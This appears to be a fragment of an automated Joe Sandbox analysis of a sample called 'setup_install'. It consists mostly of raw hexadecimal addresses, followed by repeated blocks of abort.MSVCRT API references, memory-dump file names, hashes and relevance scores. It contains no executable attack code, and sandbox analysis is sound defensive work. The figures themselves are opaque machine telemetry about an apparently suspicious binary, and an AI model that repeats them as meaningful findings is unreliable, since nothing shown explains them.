                                                                                                                            0x0040e8dc
                                                                                                                            0x0040e8dc
                                                                                                                            0x0040e8e0
                                                                                                                            0x00000000
                                                                                                                            0x0040e8e0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e8b0
                                                                                                                            0x0040e8b0
                                                                                                                            0x0040e8b4
                                                                                                                            0x0040e8b6
                                                                                                                            0x00000000
                                                                                                                            0x0040e8bc
                                                                                                                            0x0040e8bc
                                                                                                                            0x0040e8bc
                                                                                                                            0x0040e8bf
                                                                                                                            0x0040e8c1
                                                                                                                            0x00000000
                                                                                                                            0x0040e8c1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e893
                                                                                                                            0x0040e893
                                                                                                                            0x0040e897
                                                                                                                            0x0040e89a
                                                                                                                            0x00000000
                                                                                                                            0x0040e8a0
                                                                                                                            0x0040e8a0
                                                                                                                            0x0040e8a0
                                                                                                                            0x0040e8a4
                                                                                                                            0x00000000
                                                                                                                            0x0040e8a4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e870
                                                                                                                            0x0040e870
                                                                                                                            0x0040e874
                                                                                                                            0x0040e878
                                                                                                                            0x0040e87b
                                                                                                                            0x0040e87e
                                                                                                                            0x0040e880
                                                                                                                            0x00000000
                                                                                                                            0x0040e886
                                                                                                                            0x0040e886
                                                                                                                            0x0040e886
                                                                                                                            0x0040e888
                                                                                                                            0x0040e88a
                                                                                                                            0x00000000
                                                                                                                            0x0040e88a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea65
                                                                                                                            0x0040ea65
                                                                                                                            0x0040ea69
                                                                                                                            0x0040ea6c
                                                                                                                            0x00000000
                                                                                                                            0x0040ea72
                                                                                                                            0x0040ea72
                                                                                                                            0x0040ea72
                                                                                                                            0x0040ea75
                                                                                                                            0x0040ea78
                                                                                                                            0x0040ea7c
                                                                                                                            0x0040ea80
                                                                                                                            0x0040ea84
                                                                                                                            0x0040ea86
                                                                                                                            0x00000000
                                                                                                                            0x0040ea86
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea30
                                                                                                                            0x0040ea30
                                                                                                                            0x0040ea34
                                                                                                                            0x0040ea37
                                                                                                                            0x00000000
                                                                                                                            0x0040ea3d
                                                                                                                            0x0040ea3d
                                                                                                                            0x0040ea3d
                                                                                                                            0x0040ea40
                                                                                                                            0x0040ea43
                                                                                                                            0x0040ea46
                                                                                                                            0x0040ea4a
                                                                                                                            0x0040ea4e
                                                                                                                            0x0040ea52
                                                                                                                            0x0040ea56
                                                                                                                            0x0040ea5a
                                                                                                                            0x0040ea5e
                                                                                                                            0x00000000
                                                                                                                            0x0040ea5e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea90
                                                                                                                            0x0040ea90
                                                                                                                            0x0040ea94
                                                                                                                            0x0040ea97
                                                                                                                            0x00000000
                                                                                                                            0x0040ea9d
                                                                                                                            0x0040ea9d
                                                                                                                            0x0040ea9d
                                                                                                                            0x0040eaa0
                                                                                                                            0x0040eaa3
                                                                                                                            0x0040eaa7
                                                                                                                            0x0040eaab
                                                                                                                            0x0040eaae
                                                                                                                            0x00000000
                                                                                                                            0x0040eab0
                                                                                                                            0x0040eab0
                                                                                                                            0x0040eab0
                                                                                                                            0x0040eab3
                                                                                                                            0x00000000
                                                                                                                            0x0040eb82
                                                                                                                            0x0040eb82
                                                                                                                            0x0040eb84
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eb8b
                                                                                                                            0x0040eb8b
                                                                                                                            0x0040eb8d
                                                                                                                            0x0040eb8f
                                                                                                                            0x0040eb90
                                                                                                                            0x0040eb90
                                                                                                                            0x0040eb90
                                                                                                                            0x0040eb92
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eb99
                                                                                                                            0x0040eb99
                                                                                                                            0x0040eb9b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eba2
                                                                                                                            0x0040eba2
                                                                                                                            0x0040eba4
                                                                                                                            0x0040eba6
                                                                                                                            0x0040eba8
                                                                                                                            0x0040eba8
                                                                                                                            0x0040eba8
                                                                                                                            0x0040ebaa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebb1
                                                                                                                            0x0040ebb1
                                                                                                                            0x0040ebb4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebbb
                                                                                                                            0x0040ebbb
                                                                                                                            0x0040ebbd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebc4
                                                                                                                            0x0040ebc4
                                                                                                                            0x0040ebc6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebcd
                                                                                                                            0x0040ebcd
                                                                                                                            0x0040ebcf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebd6
                                                                                                                            0x0040ebd6
                                                                                                                            0x0040ebd8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebdf
                                                                                                                            0x0040ebdf
                                                                                                                            0x0040ebe1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebe8
                                                                                                                            0x0040ebe8
                                                                                                                            0x0040ebea
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ebf1
                                                                                                                            0x0040ebf1
                                                                                                                            0x0040ebf3
                                                                                                                            0x0040ebf5
                                                                                                                            0x0040ebf7
                                                                                                                            0x0040ebfa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec01
                                                                                                                            0x0040ec01
                                                                                                                            0x0040ec03
                                                                                                                            0x0040ec05
                                                                                                                            0x0040ec07
                                                                                                                            0x0040ec0a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec11
                                                                                                                            0x0040ec11
                                                                                                                            0x0040ec13
                                                                                                                            0x0040ec15
                                                                                                                            0x0040ec17
                                                                                                                            0x0040ec1a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec21
                                                                                                                            0x0040ec21
                                                                                                                            0x0040ec23
                                                                                                                            0x0040ec25
                                                                                                                            0x0040ec27
                                                                                                                            0x0040ec2a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec31
                                                                                                                            0x0040ec31
                                                                                                                            0x0040ec33
                                                                                                                            0x0040ec35
                                                                                                                            0x0040ec37
                                                                                                                            0x0040ec3a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ec41
                                                                                                                            0x0040ec41
                                                                                                                            0x0040ec43
                                                                                                                            0x0040ec45
                                                                                                                            0x0040ec47
                                                                                                                            0x0040ec4a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eab3
                                                                                                                            0x00000000
                                                                                                                            0x0040eaae
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e9e0
                                                                                                                            0x0040e9e0
                                                                                                                            0x0040e9e4
                                                                                                                            0x0040e9e6
                                                                                                                            0x00000000
                                                                                                                            0x0040e9ec
                                                                                                                            0x0040e9ec
                                                                                                                            0x0040e9ec
                                                                                                                            0x0040e9ef
                                                                                                                            0x0040e9f1
                                                                                                                            0x0040e9f5
                                                                                                                            0x0040e9f8
                                                                                                                            0x0040e9fc
                                                                                                                            0x0040e9fe
                                                                                                                            0x0040eb05
                                                                                                                            0x0040ea04
                                                                                                                            0x0040ea04
                                                                                                                            0x0040ea08
                                                                                                                            0x0040ea08
                                                                                                                            0x00000000
                                                                                                                            0x0040e9fe
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea20
                                                                                                                            0x0040ea20
                                                                                                                            0x0040ea24
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ea10
                                                                                                                            0x0040ea10
                                                                                                                            0x0040ea13
                                                                                                                            0x0040ea17
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e830
                                                                                                                            0x0040e830
                                                                                                                            0x0040e833
                                                                                                                            0x0040e836
                                                                                                                            0x00000000
                                                                                                                            0x0040e83c
                                                                                                                            0x0040e83c
                                                                                                                            0x0040e83c
                                                                                                                            0x0040e840
                                                                                                                            0x0040e847
                                                                                                                            0x0040e84a
                                                                                                                            0x0040e84e
                                                                                                                            0x0040e85b
                                                                                                                            0x0040e85b
                                                                                                                            0x0040e85e
                                                                                                                            0x00000000
                                                                                                                            0x0040e864
                                                                                                                            0x0040e864
                                                                                                                            0x00000000
                                                                                                                            0x0040e864
                                                                                                                            0x0040e850
                                                                                                                            0x0040e850
                                                                                                                            0x0040e850
                                                                                                                            0x0040e855
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e855
                                                                                                                            0x0040e84e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e7b0
                                                                                                                            0x0040e7b0
                                                                                                                            0x0040e7b2
                                                                                                                            0x0040e7b2
                                                                                                                            0x0040e7b4
                                                                                                                            0x0040e7c0
                                                                                                                            0x0040e7c0
                                                                                                                            0x0040e7c0
                                                                                                                            0x0040e7c3
                                                                                                                            0x0040e7c9
                                                                                                                            0x0040e7cc
                                                                                                                            0x0040e7ce
                                                                                                                            0x0040e7d1
                                                                                                                            0x0040e7d3
                                                                                                                            0x0040e7d3
                                                                                                                            0x0040e7d7
                                                                                                                            0x0040e7d9
                                                                                                                            0x0040e7db
                                                                                                                            0x0040e7dd
                                                                                                                            0x0040e7e0
                                                                                                                            0x0040e7e2
                                                                                                                            0x0040e7e2
                                                                                                                            0x0040e7e5
                                                                                                                            0x0040eb49
                                                                                                                            0x0040eb4b
                                                                                                                            0x0040eb4d
                                                                                                                            0x0040eb4d
                                                                                                                            0x0040e7e5
                                                                                                                            0x0040e7eb
                                                                                                                            0x0040e7ee
                                                                                                                            0x0040e7f1
                                                                                                                            0x00000000
                                                                                                                            0x0040e7f7
                                                                                                                            0x0040e7f7
                                                                                                                            0x0040e7f7
                                                                                                                            0x0040e7fb
                                                                                                                            0x0040e802
                                                                                                                            0x0040e805
                                                                                                                            0x0040e809
                                                                                                                            0x0040e812
                                                                                                                            0x0040e812
                                                                                                                            0x0040e815
                                                                                                                            0x00000000
                                                                                                                            0x0040e81b
                                                                                                                            0x0040e81b
                                                                                                                            0x0040e81b
                                                                                                                            0x00000000
                                                                                                                            0x0040e81b
                                                                                                                            0x0040e80b
                                                                                                                            0x0040e80b
                                                                                                                            0x0040e80b
                                                                                                                            0x0040e810
                                                                                                                            0x0040e81d
                                                                                                                            0x0040e81d
                                                                                                                            0x0040e81f
                                                                                                                            0x0040e821
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e810
                                                                                                                            0x0040e809
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e751
                                                                                                                            0x0040e751
                                                                                                                            0x0040e753
                                                                                                                            0x0040e753
                                                                                                                            0x0040e755
                                                                                                                            0x0040e755
                                                                                                                            0x0040e755
                                                                                                                            0x0040e758
                                                                                                                            0x0040e75e
                                                                                                                            0x0040e761
                                                                                                                            0x0040e763
                                                                                                                            0x0040e766
                                                                                                                            0x0040e768
                                                                                                                            0x0040e768
                                                                                                                            0x0040e76c
                                                                                                                            0x0040e76f
                                                                                                                            0x00000000
                                                                                                                            0x0040e775
                                                                                                                            0x0040e775
                                                                                                                            0x0040e775
                                                                                                                            0x0040e779
                                                                                                                            0x0040e780
                                                                                                                            0x0040e783
                                                                                                                            0x0040e787
                                                                                                                            0x0040e794
                                                                                                                            0x0040e794
                                                                                                                            0x0040e796
                                                                                                                            0x00000000
                                                                                                                            0x0040e79c
                                                                                                                            0x0040e79c
                                                                                                                            0x0040e79c
                                                                                                                            0x0040e79e
                                                                                                                            0x0040e7a2
                                                                                                                            0x00000000
                                                                                                                            0x0040e7a2
                                                                                                                            0x0040e789
                                                                                                                            0x0040e789
                                                                                                                            0x0040e789
                                                                                                                            0x0040e78e
                                                                                                                            0x0040eac0
                                                                                                                            0x0040eac0
                                                                                                                            0x0040eac4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e78e
                                                                                                                            0x0040e787
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e960
                                                                                                                            0x0040e960
                                                                                                                            0x0040e962
                                                                                                                            0x0040e962
                                                                                                                            0x0040e964
                                                                                                                            0x0040e964
                                                                                                                            0x0040e964
                                                                                                                            0x0040e967
                                                                                                                            0x0040e96d
                                                                                                                            0x0040e970
                                                                                                                            0x0040e972
                                                                                                                            0x0040e975
                                                                                                                            0x0040e977
                                                                                                                            0x0040e977
                                                                                                                            0x0040e97b
                                                                                                                            0x0040e97d
                                                                                                                            0x0040e97d
                                                                                                                            0x0040e980
                                                                                                                            0x0040e980
                                                                                                                            0x0040e980
                                                                                                                            0x0040e983
                                                                                                                            0x0040e989
                                                                                                                            0x0040e98c
                                                                                                                            0x0040e98e
                                                                                                                            0x0040e991
                                                                                                                            0x0040e993
                                                                                                                            0x0040e993
                                                                                                                            0x0040e997
                                                                                                                            0x0040e99a
                                                                                                                            0x0040e99c
                                                                                                                            0x0040e99e
                                                                                                                            0x0040eb39
                                                                                                                            0x0040eb3b
                                                                                                                            0x0040eb3d
                                                                                                                            0x0040eb3d
                                                                                                                            0x0040e99e
                                                                                                                            0x0040e9a4
                                                                                                                            0x0040e9a7
                                                                                                                            0x00000000
                                                                                                                            0x0040e9ad
                                                                                                                            0x0040e9ad
                                                                                                                            0x0040e9ad
                                                                                                                            0x0040e9b1
                                                                                                                            0x0040e9b8
                                                                                                                            0x0040e9bb
                                                                                                                            0x0040e9bf
                                                                                                                            0x0040e9c8
                                                                                                                            0x0040e9c8
                                                                                                                            0x0040e9cb
                                                                                                                            0x00000000
                                                                                                                            0x0040e9d1
                                                                                                                            0x0040e9d1
                                                                                                                            0x0040e9d1
                                                                                                                            0x00000000
                                                                                                                            0x0040e9d1
                                                                                                                            0x0040e9c1
                                                                                                                            0x0040e9c1
                                                                                                                            0x0040e9c1
                                                                                                                            0x0040e9c6
                                                                                                                            0x0040e9d3
                                                                                                                            0x0040e9d3
                                                                                                                            0x0040e9d5
                                                                                                                            0x0040e9d9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e9c6
                                                                                                                            0x0040e9bf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e681
                                                                                                                            0x0040e681
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e720
                                                                                                                            0x0040e720
                                                                                                                            0x0040e724
                                                                                                                            0x0040e728
                                                                                                                            0x0040e72c
                                                                                                                            0x0040e72e
                                                                                                                            0x0040e733
                                                                                                                            0x0040e736
                                                                                                                            0x0040e739
                                                                                                                            0x0040e73b
                                                                                                                            0x0040e73d
                                                                                                                            0x0040e742
                                                                                                                            0x0040e746
                                                                                                                            0x0040e74a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040e627
                                                                                                                            0x00000000
                                                                                                                            0x0040e61e
                                                                                                                            0x0040e65a
                                                                                                                            0x0040e65a
                                                                                                                            0x0040e65e
                                                                                                                            0x0040e660
                                                                                                                            0x00000000
                                                                                                                            0x0040e666
                                                                                                                            0x0040e666
                                                                                                                            0x0040e666
                                                                                                                            0x0040e66a
                                                                                                                            0x0040e670
                                                                                                                            0x0040e671
                                                                                                                            0x0040e672
                                                                                                                            0x0040e673
                                                                                                                            0x0040e674
                                                                                                                            0x0040e674
                                                                                                                            0x00000000
                                                                                                                            0x0040e660
                                                                                                                            0x00000000
                                                                                                                            0x0040e640
                                                                                                                            0x0040e70d
                                                                                                                            0x0040e705
                                                                                                                            0x0040e6ff
                                                                                                                            0x0040e6f0
                                                                                                                            0x0040e6e7
                                                                                                                            0x0040e6de
                                                                                                                            0x00000000
                                                                                                                            0x0040e6d8
                                                                                                                            0x004986e6
                                                                                                                            0x004986e6
                                                                                                                            0x004986eb
                                                                                                                            0x004986f0
                                                                                                                            0x004986f5
                                                                                                                            0x004986fa
                                                                                                                            0x004986ff
                                                                                                                            0x00498704
                                                                                                                            0x00498709
                                                                                                                            0x0049870e
                                                                                                                            0x00498713
                                                                                                                            0x00498718
                                                                                                                            0x00498720
                                                                                                                            0x00498725
                                                                                                                            0x004014e4
                                                                                                                            0x004014e6
                                                                                                                            0x004014e9
                                                                                                                            0x004014f0
                                                                                                                            0x004014f6
                                                                                                                            0x004014fb
                                                                                                                            0x00401570
                                                                                                                            0x0040157a
                                                                                                                            0x004014fd
                                                                                                                            0x004014fd
                                                                                                                            0x004014ff
                                                                                                                            0x00401506
                                                                                                                            0x00401512
                                                                                                                            0x00401515
                                                                                                                            0x0040151a
                                                                                                                            0x00401522
                                                                                                                            0x00401525
                                                                                                                            0x00401527
                                                                                                                            0x0040152a
                                                                                                                            0x0040152c
                                                                                                                            0x00401534
                                                                                                                            0x00401539
                                                                                                                            0x0040153e
                                                                                                                            0x0040153e
                                                                                                                            0x00401543
                                                                                                                            0x00401545
                                                                                                                            0x0040154d
                                                                                                                            0x00401554
                                                                                                                            0x00401554
                                                                                                                            0x00401556
                                                                                                                            0x00401569
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 0040EAD9
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 3c0003c1141817effab578e14cfc98d5b97c3a39711670aa792130195ca21dbe
                                                                                                                            • Instruction ID: 70ccfd5f9e674d083eb62807ba38022fc96774e361ac17ba39bfdf2fd32bc52d
                                                                                                                            • Opcode Fuzzy Hash: 3c0003c1141817effab578e14cfc98d5b97c3a39711670aa792130195ca21dbe
                                                                                                                            • Instruction Fuzzy Hash: 8E21277194822A4ACB309E1AA08127BF396AB91314F5C0D3BD592773C1D23FDC66D69F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E960 Relevance: 19.6, APIs: 13, Instructions: 69COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2c32e17327c934c2ffedd2d320ce0d2d6debb987ad20211f386141f9cca7b808
                                                                                                                            • Instruction ID: 71c243e10128a72bf0b588e51fa81c5a921d884fbda22b47849be55372a21007
                                                                                                                            • Opcode Fuzzy Hash: 2c32e17327c934c2ffedd2d320ce0d2d6debb987ad20211f386141f9cca7b808
                                                                                                                            • Instruction Fuzzy Hash: FF016BF18082610BE7145A26C491379AAD18B82348F08487BD8A27B383C53EC857D65E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E7A9 Relevance: 19.6, APIs: 13, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fea011d7275736edc7319be4e5e7d6045d44110f1f5ce488445f56f1c19b4493
                                                                                                                            • Instruction ID: 85d734f9743d198762c5a95cbc1c1b41694787e9c4d15e3e5bba7a0ba0af60ee
                                                                                                                            • Opcode Fuzzy Hash: fea011d7275736edc7319be4e5e7d6045d44110f1f5ce488445f56f1c19b4493
                                                                                                                            • Instruction Fuzzy Hash: 74018E728182150BDB205E258004376F7D1AB82314F198C7ADA913B342C63CAC2296CD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E630 Relevance: 19.6, APIs: 13, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 44b7270e742eae575d70b30900464014293b0d401389b4657c92eee715900c8e
                                                                                                                            • Instruction ID: 1dbd276a2ac46209dbefb016df66ec0806bc1e09e87658fa9deabfa7681a968e
                                                                                                                            • Opcode Fuzzy Hash: 44b7270e742eae575d70b30900464014293b0d401389b4657c92eee715900c8e
                                                                                                                            • Instruction Fuzzy Hash: 10F0AD30A482198BC710EF19E0841BAF7E5EB86314F000C2FE59AA7251D339E929CA99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E751 Relevance: 19.6, APIs: 13, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 66214cea094b34c952ee7fd01ede11b6bd81cde3906afbff3e90878bd5eca4c2
                                                                                                                            • Instruction ID: 7efb3c5574ee2ab640c145195ee78b533aa75e12787180b442e39c47fa14dcfa
                                                                                                                            • Opcode Fuzzy Hash: 66214cea094b34c952ee7fd01ede11b6bd81cde3906afbff3e90878bd5eca4c2
                                                                                                                            • Instruction Fuzzy Hash: 45F0C2B18582654BD7205E158095279EAA09B42318F58086EDEA13B383C23EDC67DAAF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E830 Relevance: 19.5, APIs: 13, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986E6
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
